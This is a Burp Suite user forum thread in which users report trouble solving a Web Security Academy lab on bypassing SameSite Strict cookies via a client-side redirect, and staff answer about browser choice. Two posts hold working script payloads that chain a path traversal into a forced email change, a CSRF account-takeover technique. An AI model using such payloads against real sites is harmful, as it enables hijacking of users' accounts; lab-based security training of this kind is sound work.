The Burp Suite User Forum will be discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Centre. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTRE DISCORD

Create new post

Lab: SameSite Strict bypass via client-side redirect - this lab broken too

Jack | Last updated: Jul 12, 2024 12:26PM UTC

This is my solution and works with view exploit, but not working when delivering neither in chrome, not burp. Therefor unfortunately the lab is broken. Can you please fix please? thank you <script> window.location="https://0a9400b8047be7ef81a53e4a00ac00ab.web-security-academy.net/post/comment/confirmation?postId=../my-account/change-email?email=testweweweww%40test.te%26submit=1"; </script>

Ben, PortSwigger Agent | Last updated: Jul 15, 2024 10:10AM UTC

Hi Jack, You may need to use a standard version of Chrome (rather than the embedded browser) in order to solve this lab.

Jack | Last updated: Jul 15, 2024 06:34PM UTC

it got fixed somehow

Roman | Last updated: Aug 28, 2024 06:12PM UTC

Hey, I'm having the same issue as Jack. I tested the exploit on myself first and it worked. Then I changed the email in the payload, stored the exploit and delivered to the victim, and nothing happens. Here's my exploit, it's basically the same as in the solution: ```html <script> document.location = "https://0a6b00f80450f320836810f000e90020.web-security-academy.net/post/comment/confirmation?postId=2/../../my-account/change-email?email=pwned%40evil.com%26submit=1"; </script> ```

Ben, PortSwigger Agent | Last updated: Aug 29, 2024 07:42AM UTC

Hi Roman, I have just tried this using the embedded browser in the 2024.7.4 version of Burp and was able to successfully solve the lab using the written solution provided. If you attempt this again, as of now, are you still having issues? If so, which browser are you using when you attempt this lab?

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.